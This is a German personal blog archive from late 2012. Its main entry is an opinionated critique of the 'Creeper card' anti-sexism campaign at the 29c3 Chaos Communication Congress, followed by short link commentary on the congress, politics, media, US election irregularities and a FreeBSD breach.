Ein anderes Beispiel war, dass jemand aus den Creepercards einen Frauenkörper gelegt hatte. Erinnern wir uns kurz daran, was ein Hacker ist. Ein Hacker ist jemand, der kreativ mit Dingen umgeht, die andere nur wie vorgesehen benutzen würden. Hier hat jemand Creepercards gesehen und ist damit kreativ umgegangen. Genau diese Art von Menschen wollen wir haben! Die aus an sich negativen Dingen Kunst machen können! Das war aus meiner Sicht auch das Hauptproblem und Auslöser für die unentspannten Momente, dass die meisten Besucher die Karten nicht ernst nahmen, sondern für einen Spaß hielten. In einem Umfeld, in dem Pro-Guttenberg-Demonstrationen organisiert werden und in dem Leute mit Fnord-T-Shirts herumlaufen, die täuschend echt nach dem Ford-Logo aussehen, ist das ja wohl auch nicht verwunderlich, denn die Karten erfüllten alle Kriterien von Satire: kein Ansprechpartner genannt, keine Anleitung oder Einführung zum Schaffen eines Problembewusstseins dabei, keine weiterführenden Links, anhand derer man sehen kann, was einem da eigentlich gerade konkret vorgeworfen wird und wie man sein Verhalten ändern soll, und aus Sicht der meisten Besucher bestand auch kein Bedarf an einer Lösung für das Sexismus-Problem, weil das Problem so nie wahrgenommen wurde. Ich würde sogar konstatieren, dass die Karten für ihren vorgeblichen Zweck offensichtlich völlig ungeeignet waren, aber das hat auch mit dem Congress zu tun, der ja nicht grundlos Chaos Communication Congress heißt. Beim Congress geht es um das Kommunizieren. Sexismus ist ein soziales Problem, sowas löst man, indem man miteinander redet. Diese Karten sind kein Kommunikationsmittel, sondern ein Kommunikationsbeendigungsmittel. Das ist kein Kommunizieren, das ist ein Pranger. Auf den roten Karten stand sinngemäß drauf, man solle froh sein, dass man nicht direkt einen in die Fresse gekriegt habe, und stattdessen nur diese Karte hier überreicht bekommen hat. Wer körperliche Gewalt androht, hat sich in jeder auf Kommunikation aufbauenden Kultur direkt vollständig und nachhaltig selbst disqualifiziert. Ich für meinen Teil habe die Debatte im Vorfeld partiell mitgekriegt und nahm an, dass die Karten ernst gemeint waren. Der Großteil der Congressteilnehmer wusste das nicht und hielt das für einen schlechten Scherz. Dementsprechend wurden dann damit gespielt. Das Spektrum ging vom erwähnten Frauenkörper über ein Penis aus grünen Karten, über eine Krone, ein Minecraft-Creeper, ein Brustpanzer (sehr meta!) bis hin zu Space Invaders. Für Penis und Frauenkörper gibt es inzwischen ein Bekennerschreiben. Das A-Team hat sich mit denen hingesetzt und ihnen erklärt, dass das eine Provokation sei und für die Gesamtsituation nicht förderlich, und dann war das weg und alles war wieder gut. Kommunikation hilft nämlich in solchen Situationen — im Gegensatz zu Pranger-Karten.
Der andere wohlpublizierte Fall war das Hacker Jeopardy, bei dem auf Twitter die größte Empörung von Menschen kam, die überhaupt nicht auf dem Congress waren. Und nur ein verschwindend geringer Bruchteil von denen hatte die Integrität, das auch dranzuschreiben an ihre Tweets. Ich empfehle jedem, sich erstmal in Ruhe den Stream anzugucken, bevor sich da irgendwelche Meinungen auf Basis von Hysterie-Tweets anderer Leute bilden. Die rote Karte ist ihrem Text nach zu urteilen ausdrücklich für wirklich widerliche, handgriffliche, physische Übergriffe gedacht, so Kategorie "Angreifer nähert sich mit heruntergelassener Hose und ausgestreckten Händen in Grabbelhaltung". Ich kann es den Moderatoren angesichts der geradezu lächerlichen Zoten, derer sie da angeklagt werden, nicht übel nehmen, dass sie die Übergabe der roten Karten für eine Satire-Handlung hielten. Zumal hier mit unproportionaler Agressivität auf Witze über die Creepercards reagiert wurde, nicht über Frauen oder Minderheiten. Über die Karten. Es gab danach ein Gespräch zwischen den Moderatoren und dem A-Team und jetzt sind die Missverständnisse ausgeräumt. Kommunikation hilft nämlich bei sowas, Karten nicht.
Sehr spannend beim Hacker Jeopardy ist auch, dass bei all dem gerechten Zorn und der Hysterie auf Twitter (bis hin zu "Macker-Jeopardy" und Aufrufen, die Moderatoren rauszuschmeißen und Hacker-Jeopardy zu verbieten!) kaum jemand sagen konnte, was eigentlich der Auslöser war. So nichtig war der Auslöser. Eine Version, die ich hörte, war dass jemand angesichts der offenen Frauenförderung der Moderatoren gegen die positive Diskriminierung protestieren wollte. Dem kann man sich jetzt inhaltlich anschließen oder nicht, aber eine rote Karte für positive Diskriminierung ist ja wohl völlig indiskutabel.
Unter dem Strich stellte sich bei Einigen die Befürchtung ein, dass es bei diesen Karten gar nicht darum geht, irgendein tatsächlich vorhandenes oder eingebildetes Sexismus- oder Übergriffsproblem zu lösen, sondern es nur um das Kaputtmachen des Kongresses geht. Es gab da im Vorfeld einige Tweets und Blogkommentare im Umfeld der Klotür-Geschichte, die sich so deuten ließen. Auf der anderen Seite soll man niemandem bösen Willen unterstellen, nur weil das Ergebnis ihrer Bemühungen negativ ist und sie ihren Kurs nicht korrigieren. Daher gab es Gespräche zwischen A-Team und der Flauscheria und (soweit bekannt) den Mitbringern der Creepercards, die am Ende in einer "Policccy"-Gesprächsrunde mündeten. Das Ergebnis war ernüchternd. Die Creepercard-Verantwortlichen schoben das Versagen der Karten der Congress-Orga in die Schuhe. Einige der üblichen Verdächtigen kamen gar nicht erst zu dem Treffen. Das hat die Fronten eher verhärtet, auf Clubseite fallen jetzt vereinzelt Wörter wie "Agitation", und es stellt sich das Gefühl ein, dass hier jemand angereist ist, um Vorwände für Empörung zu suchen, und wenn kein Problem da ist, dann konstruiert man halt eines, indem man zu einer Gameshow spät in der Nacht geht und dort die flapsige Moderation anprangert. Das fühlt sich alles an wie ein Trollversuch, nicht wie der berechtigte Hinweis auf ein tatsächliches Problem. Und der Verlierer ist am Ende der Kampf gegen den tatsächlichen Sexismus, denn hier werden Begriffe wie "Sexismus", "Vergewaltigung", "Rape Culture" u.ä. so inflationär durcheinandergeworfen, dass am Ende jemand mit einem wirklichen Übergriffsproblem statt der nötigen Hilfe ein "Haha, hat dir jemand was an die Klotür gemalt?" kriegt, weil drumherum so viel undifferenziert hyperventiliert wurde.
Wie fließend die Übergänge zwischen Satire und Realität waren, kann man anhand dieses Tweets an sich selber prüfen. Ist das jetzt ernst gemeint oder Satire? Die können doch nicht ernsthaft eine Flauschecke aufmachen und dann Knutschende rausschmeißen? Oder doch? Schon während des Kongresses hat die Presse angefangen, explizit nach Frauen auf dem 29c3 zu suchen. Ihr werdet doch bestimmt auch krass unterdrückt hier, oder? Operation erfolgreich, Patient tot.
Oder wie ist es hiermit? Die Karten haben nicht nur die Stimmung vergiftet, sondern selbst zu mehr Belästigung geführt als es vorher ohne sie gab und sie zu bekämpfen vorgaben. Klar, man kann da jetzt Unwissenheit, Naivität und Inkompetenz unterstellen. Oder man kann davon ausgehen, dass das die Absicht war. Ich habe mir meine Meinung noch nicht zu Ende gebildet an der Stelle, tendiere aber alleine aus verschwörungstheoretischen Gründen grundsätzlich zu Absicht.
Unabhängig davon ist der Schaden natürlich jetzt angerichtet. Weil hier ein paar Menschen ihr Lebensbild dem Rest der Welt aufdrängen wollten, hat der Kongress jetzt nicht nur Gender-Trolle sondern auch Maskulinisten am Bein, und Taliban aller Couleur. Hier wird "ich fühle mich belästigt" zum Maßstab für das Handeln aller Anderen erhoben. Was wenn nächstes Jahr die katholische Kirche oder die Scientologen ankommen und sich in ihrer Religionsausübung unterdrückt fühlen? Einer der Vorträge dieses Jahr war Sprache, Ungleichheit und Unfreiheit von Anatol Stefanovitsch. Das hätte die Debatte voranbringen können, aber ging so im Gezeter über "Macker-Jeopardy" unter.
Abschließend möchte ich noch darauf hinweisen, dass der CCC seit Jahren gegen die Vorratsdatenspeicherung kämpft, weil dort weite Teile der Bevölkerung unter Pauschal-Verdacht gestellt werden. Einer der NSA-Whistleblower hat in seinem Vortrag erwähnt, dass eine der wichtigsten Freiheiten die Freiheit von Verdacht und Ermittlung sei. Und jetzt kommen hier ein paar selbsternannte Aktivisten und fordern von uns, dass wir unsere Teilnehmer unter Pauschalverdacht stellen und Warnhinweisschilder aufstellen, dass sexuelle Übergriffe und Sexismus bei uns unerwünscht sind. Das zeugt von einem so geringen Ausmaß an sich vorher mal auf die Zielgruppe eingelassen habens, dass solche Leute bei mir direkt verloren haben und das auch nur unter größtem Aufwand wieder reparieren können. Überhaupt drängt sich der Eindruck auf, dass die lautesten Kritiker noch nie auf einem Kongress waren.
(Kurzes Intermezzo) Wo kommen diese Creeper-Cards eigentlich her? Aus den USA. Dort herrscht eine völlig andere Hacker-Konferenz-Kultur. Auf der Defcon liefen vor ein paar Jahren Porno-Modelle halbbekleidet herum und machten Werbung für diese Porno-Produktion, bei der ein Model die nmap-Homepage vorliest. Da gibt es auch eine ganz andere Prüderie und ein höheres Alterslimit für Alkohol, was sich dann auf Konferenzen so niederschlägt, dass hormonell unbalancierte Jugendliche zum ersten Mal Alkohol trinken und mit weiblichen Brüsten konfrontiert werden und dann enthemmt Frauen angraben. Die Leute, die diese Karten nach Deutschland geholt haben, kennen vermutlich weder die Defcon noch den Kongress. Die Defcon findet übrigens in Las Vegas statt, d.h. das Ambiente dort sind Spielhöllen, Showgirls und Stripper.
Die Lautesten unter den Empörten waren auch diesmal nicht vor Ort sondern empörten sich aus der Ferne. Einige kamen beim Kongress direkt mit einer Haltung wie "respektiert mich endlich auch mal und hört mit dem Grapschen auf" an, und wunderten sich dann über das Unverständnis derjenigen, die seit Jahren da sind und noch nie von Grapschproblemen gehört haben und bei denen man sich Respekt erarbeitet und nicht einfach nur einfordert.
Zusammenfassung: Probleme löst man, indem man über sie redet. Nicht indem man andere Leute öffentlich an den Pranger stellt. Die Creeper-Karten haben so viel Schaden angerichtet, dass selbst wenn jemand noch einen positiven Aspekt nachweisen kann, netto nur Verlust übrig bleibt. Das war alles vorher schon absehbar. Es ist eine Schande, dass Einzelne das Kaputtmachen einer so schönen Sache wie des Kongresses billigend in Kauf nahmen, und dabei noch als Kollateralschaden ihr vorgebliches Anliegen der Sexismusbekämpfung generell beschädigen. Ich hoffe sehr, dass da jetzt alle was draus gelernt haben.
Update: Hier kommt gerade eine Mail von einem der beiden rein, die die erste rote Karte überreicht haben, mit Bitte zum als Update dranhängen. Ich zitiere mal:
Wir haben uns spontan ueberlegt ob es gelb oder rot werden soll. Du hast recht: 'rot' sollte eigentlich bei krassen Grenzueberschreitungen, insbesondere auch taetlichen Uebergriffen, verwendet werden. Insofern haben wir uns auch die Frage gestellt, ob 'rot' vllt zu krass waere. Unser Argument fuer 'rot' war letztlich: diese Buehne, die ganze mediale Aufmerksamkeit — das wirkt alles als Multiplikator fuer den 'normalen' Alltagssexismus, der von der Moderation verbreitet wurde. Aus diesem Grund wurde es 'rot'.
Update: Und jetzt kommt auch noch raus, dass die vielzitierten angeblichen Übergriffsfälle einer der zentralen Anklägerinnen in Sachen Sexismus auf dem Kongress auch nur Hörensagen Dritter sind und als sie sich selbst als Opfer eines Übergriffs fühlte, rief sie nicht die Hotline an. Wenn ich einer der Hotline-Freiwilligen wäre, würde ich mir da auch ziemlich verarscht vorkommen. Und dann anzweifeln, dass man ihr geholfen hätte. Ganz großes Tennis. Ich stelle mir da so eine Stille Post vor, aber immer im Kreis herum und in einer Echokammer.
Update: Wird immer übler:
Ich rante wann und wo ich will. Und die Sache kann mich mal kreuzweise.
Update: Mir erzählten übrigens mehrere Leute, dass jemand eine gelbe Karte erhalten haben soll, weil er einer Frau die Tür aufgehalten habe. Weil das positive Diskriminierung ist.
Update: Hier ist übrigens die Liste der Verantwortlichen. Nota Bene: das sind alles Macker, die da den armen wehrlosen Frauen ihre Probleme "lösen", ob die einverstanden sind oder nicht. Und sie wollten ursprünglich nur gelbe und rote Karten drucken.

Sun Dec 30 2012

[l] So, letzter Tag beim 29c3. Gestern war natürlich mal wieder vor allem mit Last-Minute-Vorbereitungen zum Fnord-Jahresrückblick verplant — das sieht man von außen nicht so, wieviel Aufwand das immer ist, aber wir hatten da so um die 180 Folien, alle choreographiert und mit dem Versuch eines Spannungsbogens, Übergänge zwischen den Kategorien und innerhalb der Kategorien soll das ja auch irgendwie passen, und natürlich das Raussuchen der ganzen Bilder… wir sind immer froh, wenn die Folien halbwegs im Kasten sind, und dann kann trotzdem auf dem letzten Meter noch einiges überraschendes passieren. So hat dieses Jahr jemand angefangen, diese Verpackungs-Füllmaterial-Folien zu verteilen, die mit den vielen Bläschen, die man alle aufpoppen kann. Da haben ein paar Nerds zusammengelegt, um genug Folien für den ganzen Saal zu haben, obwohl der so unglaublich riesig war. Und weil das als Trollversuch gedacht war, hat der natürlich vorher niemandem Bescheid gesagt (er kam später auf uns zu und hat das aufgeklärt). Ich erwähne das, weil viele Besucher glauben, dass das unsere Idee war und wir die da hätten verteilen lassen. Nein, waren wir nicht, aber an dieser Stelle vielen Dank für die fnordige Idee, das war schon ein cooler Sound, als wir am Anfang einen Soundcheck gemacht haben mit Countdown und "alle poppen jetzt mal ein Bläschen bei sich". Da hätte sich direkt mal Surround-Sound-Aufnahme gelohnt für.
Ich hatte ansonsten nur noch Zeit für den Hashfunktionen-Vortrag, den ich auch nur empfehlen kann. Nicht nur kurzweilig und informativ sondern man kann auch direkt mal was konkretes mitnehmen, was man in seiner Programmierpraxis ändern kann. Ich habe übrigens angesichts dieses Vortrages auch mal einen Bug gegen gcc geöffnet, damit die die Hashfunktion in der C++-Laufzeitumgebung ändern. Mal gucken, was daraus wird.
Weil da schon einige Nachfragen kamen: das CCTV-Abflex-Video gibt es hier. Wir haben am Anfang ein bisschen gekürzt.
Wir möchten uns auch ausdrücklich bei Anne Roth entschuldigen, die die undankbare Aufgabe hatte, heute morgen als ersten Vortrag im Programm über den Verfassungsschutz zu sprechen, und die im Fnord-Rückblick zusehen musste, wie wir (nicht absichtlich, versteht sich) einige ihrer Pointen verbrannt haben. Tut uns leid! Ging uns aber partiell auch so; die NSA-Whistleblower hatten unter anderem eine Folie, die dazu aufrief, dass man doch bitte mehr Spam mit spannenden Schlüsselwörtern verschicken solle, und wir hatten eine Folie, dass der BND bei seiner "strategischen Email-Aufklärung" hauptsächlich mit Spam-Auswertung beschäftigt ist. Da muss man auf so einer Veranstaltung halt durch. Doppelt hält ja auch besser :-)
Ich bin insgesamt jedenfalls ausgesprochen erfreut, wie schön der Congress war, und möchte mich bei allen Organisatoren und Helfern bedanken, dass sie uns so ein cooles Event ermöglicht haben. Und der CCC hat unser aller Dank verdient, dass er das Event überhaupt veranstaltet hat, obwohl es bis zuletzt deutlich so aussah, als ob da rote Zahlen bei rauskommen würden. Zuletzt hörte ich, dass es nach einer schwarzen Null oder sogar einem kleinen Plus aussieht. Verdient, wie ich finde! Und unter solchen Umständen noch am eigenen Ast zu sägen und die Vorträge nicht nur live kostenlos ins Internet zu streamen sondern auch noch innerhalb von 24h bei Youtube oben zu haben, das muss man würdigen. Ich möchte an der Stelle auch darauf hinweisen, dass der CCC keine technischen Anforderungen an Mitglieder stellt. Man muss kein Hacker sein, nicht mal einen Computer haben, um beitreten zu können. Wer dem CCC also helfen will, der ist herzlich eingeladen Mitglied zu werden (und sich dann natürlich auch einzubringen). Aber man kann auch einfach nur so Mitglied werden, um regelmäßig über den Mitgliedsbeitrag den Club zu sponsorn.
Eine Beobachtung sei mir noch erlaubt: auf dem Congress gab es auch eine Flauschecke, und beim Rumlaufen glaubte ich beobachten zu können, dass das die Ecke mit den am wenigsten entspannt wirkenden Besuchern war. Ich weiß nicht, was da der Hintergrund war, aber wer auf einer Veranstaltung wie dem 29c3 abends nach Einsetzen der Dunkelheit nicht tiefenentspannt aussieht, während drumherum alle ausgelassen Party feiern oder mit Tschunkslushie im Bällebad chillen, der macht irgendetwas fundamental falsch.
Update: An der Stelle sei auch noch mal ausdrücklich FEM gelobt, die wieder einmal das Video-Team gestellt haben und die Videos zum Download anbieten. Ihr rockt! Mir ist keine andere Veranstaltung dieser Größenordnung bekannt, bei der das auch nur annähernd so gut klappt!

Tue Dec 25 2012

[l] Früher haben wir uns über Gleichschaltung der Medien Sorgen gemacht, heute schalten sich die Werbeabteilungen der ganzen Regionalverlage freiwillig gleich. Der Einfluss, den ein Inserent auf die Medienlandschaft Deutschlands nehmen kann, steigt damit enorm. Ich halte das für eine sehr bedenkliche Entwicklung. Auf der anderen Seite könnte das auch heißen, dass eine einzelne Zeitung sich mehr trauen kann, wenn der Inserent rein buchungstechnisch gar nicht "alle Zeitungen bis auf diese, weil die uns geärgert hat" buchen kann. Aber das ist so nicht geplant, wenn ich das richtig sehe.

Thu Dec 20 2012

[l] Schweizer Grenzwacht hält SWR-Team für drei Stunden fest. In der Nähe war ein Spielzeuggeschäft überfallen worden und ihr Auto war von einem Zeugen als das Fluchtfahrzeug wiedererkannt worden. Und weil das halt ein Kamerateam ist, haben wir jetzt mal einen Bericht darüber, wie das so ist, wenn man von Schweizer Grenzern festgehalten wird: Handschellen, erkennungsdienstliche Behandlung, Auto durchsucht, kein Telefonanruf erlaubt, um den Arbeitgeber zu informieren. Alle drei kamen in Einzelzellen, mussten sich zur Leibesvisitation nackt ausziehen. Spannendes Detail: weil sie nicht befragt wurden (sondern nur nackig gemacht und begrabbelt), mussten sie auch nicht über ihre Rechte aufgeklärt werden. Wir sind ja schließlich nicht in Amerika hier!
[l] Ungewöhnlichster Bestechungsversuch des Jahres: Umschlag mit Schecks über eine halbe Milliarde Dollar an der Klagemauer gefunden. Die Verwaltungsstiftung der Klagemauer findet da wohl häufiger Schecks, aber üblicherweise sind das kleinere Beträge aus afrikanischen Ländern und die Schecks platzen dann, wenn man sie einlösen will. (Danke, Mathias)
[l] Da war wohl der Zensor pinkeln: Sony hat einen Film zur Ermordung von Bin Laden gemacht, und zwar mit Mitarbeit der CIA. Die CIA hat mitgeholfen. DIE CIA. Hat mitgeholfen. Und was zeigt der Film? Wie sie foltern, um Bin Laden zu finden. Und jetzt heulen ein paar US-Senatoren rum, dass die USA doch niiiieee foltern würden. Natürlich nicht, natürlich nicht. Die Informationen haben wir, äh, also da landete eine Brieftaube, und die hatte die GPS-Koordinaten an einem Zettel am Bein!1!!
Update: Die Senatoren meckern nicht herum, dass die USA nicht foltern würde, sondern dass der Film so tut, als hätte die Folter funktioniert und sie zu Bin Laden geführt. Das finde ich ja fast noch lächerlicher, wenn die CIA beim Film beratend zur Seite stand, was haben die denn da erwartet, was der Film sagen würde?

Sun Dec 16 2012

[l] Die Fundi-Moslems gucken sich gerade von den Fundi-Christen den Kreationismus und Leugnen der Evolution ab. Das habt ihr ja toll gemacht, liebe Fundi-Christen. Da wächst zusammen, was zusammen gehört. Aus Gründen der Fairness müssen die Medien jetzt den Fundi-Moslems gleich viel Aufmerksamkeit widmen wie euch.

Fri Dec 14 2012

[l] Zu Israel gibt es gerade einen sehr interessanten Artikel in Le Monde Diplomatique. Und zwar haben in Israel Migranten aus Afrika und Ostasian die "niedrigen Arbeiten" übernommen, die früher von Palästinensern gemacht wurden, bevor Israel die Checkpoints so zugenagelt hat. Die steigende Anzahl an diesen Migranten hat zu einer Zunahme an Ausländerfeindlichkeit geführt, und zu ausländerfeindlichen und rassistischen Angriffen gegen die Migranten. Einwanderungspolitik ist ein wichtiges Thema gerade.
Money Quote:
Miri Regev von der Likud-Partei Netanjahus verstieg sich zu der Behauptung, die Afrikaner seien für die israelische Gesellschaft "ein Krebsgeschwür". (Dafür musste sie sich einige Tage später öffentlich entschuldigen - bei den Krebspatienten, nicht etwa bei den Afrikanern.)
Die Wilders-isierung Israels ist offenkundig schon recht weit vorangeschritten. Schaut nur, was für Gesetze die da schon verabschiedet haben:
Jüngst hat das Parlament ein "Gesetz zum Schutz vor Eindringlingen" verabschiedet, das unter anderem erlaubt, Asylbewerber bis zu drei Jahren ohne Gerichtsverfahren in Haft zu behalten - und diese Frist kann immer wieder unbegrenzt verlängert werden.
Dieses Gesetz geht historisch auf ein Vorläufergesetz zurück, mit dem die Palästinenser daran gehindert werden sollten, in ihre Wohnorte zurückzukehren.
Damals galten alle Palästinenser als "feindliche Eindringlinge".
(Danke, Christoph)

Tue Dec 11 2012

[l] Russia Today hat ein Video aus dem Cockpit eines Selbstbau-Panzers der ~~Salafisten~~ Syrischen Rebellen gemacht, mit Playstation-Steuerung. So ein paar cm Stahl haben sie da offenbar, insofern wird das gegen Gewehre und Handfeuerwaffen vermutlich helfen. Sieht ziemlich Mad-Max-mäßig aus, das Teil :-) (Danke, Christian)
[l] HSBC zahlt knapp 2 Milliarden Dollar Strafe an die USA, weil sie mit dem Iran Geschäfte gemacht und für mexikanische Drogenkartelle Geld gewaschen haben.

Wed Dec 5 2012

[l] Falls sich jemand noch Illusionen macht, wohin die Reise mit der ITU ginge: Die haben kürzlich erst einen Standard für Deep Packet Inspection in Next Generation Networks gemacht. Das sind so deren Prioritäten fürs Internet.

Wed Nov 28 2012

[l] Wie Schwarz-Geld den Armutsbericht gefälscht hat. Wie immer bei den "Konservativen", erst in einer faktenfreien Zone Politik machen und dann den Wähler anlügen und die Ergebnisse fälschen. Ein widerliches Pack aus Korruption und krimineller Energie, ein Wunder dass die katholische Kirche noch keine Lizenzforderungen geltend gemacht hat.

Sun Nov 25 2012

[l] Gruseliger Artikel einer "Zeit"-Reporterin, die sich undercover in eine US-Evangelikalen-Kaderschmiede begeben hat. Nur für einen Tag der offenen Tür, denn als sie offiziell als Reporterin anfragte, hat man ihr kurzfristig abgesagt, weil man mit deutschen Reportern keine guten Erfahrungen gemacht habe.

Fri Nov 23 2012

[l] Der Präsident von Ägypten hat sich dann auch gleich mal per Dekret zum El Presidente gemacht. Die Opposition ist nicht angetan davon.

Thu Nov 22 2012

[l] Nach Klage der Menschenrechtsorganisation "Judicial Watch" hat das Pentagon jetzt ein paar Details zur Bin-Laden-Seebestattung freigegeben. Oder besser: bekanntgegeben, dss sie keine Details haben, die sie bekanntgeben könnten. Denn:
Von der Seebestattung gibt es nach Angaben des Pentagons weder Foto- noch Videoaufnahmen. Es sollen auch keine Fotos von der Leiche Bin Ladins auf dem Flugzeugträger gemacht worden sein. Das Pentagon teilte außerdem mit, weder Todesurkunde und Autopsiebericht noch Ergebnisse von DNA-Tests finden zu können, mit denen die Identität Bin Ladens festgestellt worden sein soll.
"Überwacht" wurde die Aktion von der CIA, und die haben bisher gar nicht auf Anfragen nach Freigabe reagiert.

Wed Nov 21 2012

[l] Habt ihr gehört, dass Freiburg von OpenOffice zurück wechselt zu Microsoft Office?
Habt ihr auch gehört, dass sie sich zur Begründung auf ein Gutachten beziehen, das von dem Aufsichtsratvorsitzenden eines zertifizierten Microsoft-Partners gemacht wurde? Und dass die SPD ihre Entscheidung mit Beiträgen aus dem Heise-Forum begründet hat?
Kann man sich gar nicht ausdenken, sowas. (Danke, Björn)

Tue Nov 20 2012

[l] Zeitschriftendomino: Gruner+Jahr stellt die Financial Times Deutschland ein, verkauft Impulse und Börse Online. Capital wollen sie weiterführen, da hätte ich ja an deren Stelle lieber die FTD behalten. Aber gut, wenn die noch nie Gewinn gemacht hat, dann ist das schwer zu argumentieren.
[l] Israels Luftabwehrsystem "Iron Dome" scheint tatsächlich zu funktionieren, und soll nicht nur einkommende Raketen abfangen können, sondern auch Mörser- und Artilleriegeschosse im ballistischen Flug. Israel hatte zuletzt im 1. Golfkrieg auf Patriot von den Amerikanern gesetzt und damit sehr schlechte Erfahrungen gemacht.
Ich bin ja erstaunt, dass das überhaupt klappt mit den Mörser-Geschützen. Von der Größe her muss man sich so ein Geschoss wie einen Feuerlöscher vorstellen, dass man das per Radar von Vögeln unterscheiden kann, das finde ich bemerkenswert.
Es bleibt natürlich die Frage offen, ob das nicht immer noch ein valider Angriffsvektor für die Palästinenser ist, wenn jede Abwehrrakete den Staat Israel $100000 kostet. Solange ihre Geschosse nur einen Bruchteil davon kosten…
Außerdem fällt mit so einem funktionierenden Abwehrsystem natürlich auch die moralische Rechtfertigung für israelische Vergeltungsschläge gegen den Gazastreifen weg.

Sat Nov 17 2012

[l] FreeBSD wurde die Infrastruktur aufgemacht. Sie sind sich bisher ziemlich sicher, dass es nicht das Base-OS betrifft, aber bei den Packages sind sie sich noch nicht sicher.

Thu Nov 8 2012

[l] Wie das mit den Sparmaßnahmen in Griechenland funktioniert.
"These are the very last painful measures," said [Samaras], whose fragile coalition had faced its greatest test with the vote. "If further fiscal adjustment is needed it will come from clamping down on tax evasion and cutting public expenditure."
DANN, wenn es GAR NICHT anders geht, DANN würden sie mal gegen Steuerhinterzieher vorgehen. Vielleicht. Oder sie geben einfach weniger aus. D.h. sie sparen. Genial! Da fragt man sich doch, was sie bisher gemacht haben.

Wed Nov 7 2012

[l] Dieser Wahlabend gestern hat ja mal so richtig reingerieben, was für eine Farce die US-Wahl ist. Wir fingen den Abend an mit einer überwältigenden Chance für einen Obama-Sieg, die Schätzungen gingen von 85% bis über 90%. Aus meiner Sicht ergab dieses ganze Wahlnacht-Rumgepompe überhaupt nur dann einen Sinn, wenn man mit der Verkündung des Ergebnisses auch wartet, bis man es mit deutlich höherer Sicherheit in der Hand hat.
Aber als mitten in der Nacht Obama plötzlich seinen Sieges-Tweet raushaute, da bestätigten ihn plötzlich alle großen Nachrichtenorganisation — ohne dass irgendwelche neuen Zahlen vorlagen! Der einzige Swing State, der ihm die Wahl garantiert hätte zu dem Zeitpunkt, war Florida. Florida hat aber niemand an Obama gegeben zu dem Zeitpunkt. Was sie dann an Obama gaben war Ohio, und da stand die Auszählung bei 75% und die Verteilung war 2100000 gegen 2050000. Das war also noch ganz klar im Ramen der statistischen Schwankung, zumal die ja die Zahlen nicht als Hochrechnung rausgeben, wo man anhand einer demografischen Gleichverteilung wie der Gesamtstaat arbeitet, sondern das waren schlicht die Wahlkreise, die schon ausgezählt waren, die anderen hätten auch anders verteilt sein können. Selbst jetzt ist das Ergebnis in Ohio noch nicht überzeugend, finde ich, laut New York Times steht es bei 99% Auszählung 2672302 zu 2571539 — aber da sind ja wie gesagt die "provisional ballots" noch gar nicht dabei!
Heute wird dann auch Florida für Obama gezählt, wo der Abstand zwischen Obama und Romney ca 60000 Stimmen sind. Und auch hier sind die Provisional Ballots noch nicht drin.
Gut, bei denen kann man jetzt davon ausgehen, dass sie hauptsächlich in Richtung Obama gehen werden, weil die ja hauptsächlich Ergebnis der republikanischer Wählerunterdrückung waren.
Dennoch. Mein Gefühl war, dass sie das im Wesentlichen zu einem Zeitpunkt gecalled haben, als noch keiner der wichtigen Swing States (nur New Hampshire, welches nicht wirklich entscheidend war) klar war. Die Wahrscheinlichkeit für einen Obama-Sieg war genau so hoch wie am Anfang der Wahlnacht! Wieso haben wir dann überhaupt die Wahlnacht gemacht, wenn wir dann einfach irgendwann sagen, hey, das sieht klar genug aus, scheiß auf die tatsächlichen Zahlen?
Bei uns versuchen sie immerhin noch, es seriös aussehen zu lassen. Enttäuschend, diese Amis.
Update: Wenn ich schreibe, "sie" haben Ohio an Obama gegeben, dann meinte ich nicht alle sondern MSNBC, die sich da völlig unseriös aus dem Fenster gelehnt haben mit ihren Prognosen. Die anderen haben später nachgezogen.
Update: Es gibt ja eine relativ große Bevölkerungsgruppe in den USA, die die Position vertritt, Republikaner und Demokraten seien eh die selbe Partei, nennen sie dann "Republicrats" oder so, und das ist alles nur Theater mit den Wahlen. Es geht darum, immer wechselseitig eine Partei dranzulassen, die verkackt dann alles nach Strich und Faden, und die Medien reiben es doll genug rein, dass die Bevölkerung vergisst, wie schlimm die "andere" Partei davor verkackt hat, und dann wechselt man wieder. Ich bin geneigt, diese Wahl als Beweis für diese Anschauung zu werten. Dass die Republikaner kampflos aufgaben, das lässt sich nur so erklären, dass die gar nicht gewinnen wollten, sondern nur Show gemacht haben, um ihren Teil im Theater zu spielen. Das wichtige ist ja auch, dass die Republikaner im Repräsentantenhaus weiterhin die Mehrheit haben. Damit ist Obama zwar Präsident aber kann keine Gesetze durchsetzen. Es wird also genau so lahm weitergehen wie bisher. Eine Farce.

Tue Nov 6 2012

[l] Noch ein paar Wahlabend-Updates:
- Die Caging-Gruppe "True the Vote" wurde in Ohio offiziell nicht als Wahlbeobachter zugelassen.
- In New Jersey werden Wähler nach einer "Photo ID" gefragt, dabei gibt es dort überhaupt kein Gesetz, dass man zur Wahl eine Photo ID haben muss. Außerdem haben einige Wahlbüros spät aufgemacht, andere hatten gar keine Wahlzettel da. Da werden wohl einige auf Email-Voting zurückgreifen müssen.
- Florida beklagt die ersten ausfallenden Wahlcomputer.
- Republikanische Senatorin schickt Drückerkollonnen mit "Obama / McMahon"-Shirts los, wunderbare False Flag Operation!
- Die Wahlbehörde in Pinellas County in Florida hat Robocalls gemacht, dass die Wahl erst am Mittwoch sei. Grund: "Ein Computerfehler". Nee, klar.
- In Hinds County, Mississippi, sind eine unbekannte Anzahl an Wählerregistrierungen "verlorengegangen". Wenn man betroffen ist, soll man ein "affidavit ballot" abgeben. Bestimmt auch ein bedauerliches Missverständnis, oder ein Computerfehler.
- Die Erklärung, warum die Wahlzettel in Florida so grotesk lang sind:
  Unlike citizen-led ballot initiatives, which require court approval and are bound to a mere 75 words, legislative amendments face no such restrictions – in either word length or quantity.
  Also haben die Republikaner 11 Seiten mit Kleingedrucktem an unklar formulierten Verfassungsänderungen angehängt. Ziel ist natürlich, dass sich ärmere Bürger das zeitlich nicht leisten können, und dass in ärmeren Bezirken die Wahl gleich gar nicht geht, weil nicht alle wählen können, wenn das pro Person ne Stunde braucht. Und was das für unfassbare Vorschläge sind! Kann man sich gar nicht ausdenken! Einer will verbieten, dass Personen und Firmen zum Erwerb von Krankenversicherung gezwungen werden können, um Obamas Gesundheitsreform auszuhebeln. Ein weiterer will Steuervergünstigungen für Besitzer eines zweiten Hauses (uh, wtf?!). Und Einfluss auf die Richter im State Supreme Court wollen sich die Republikaner auch gleich geben lassen. Un-fass-bar. Alleine das Ausdrucken der Stimmzettel dauert in Miami-Dade pro Person 70 Sekunden, das sind 12 Seiten.
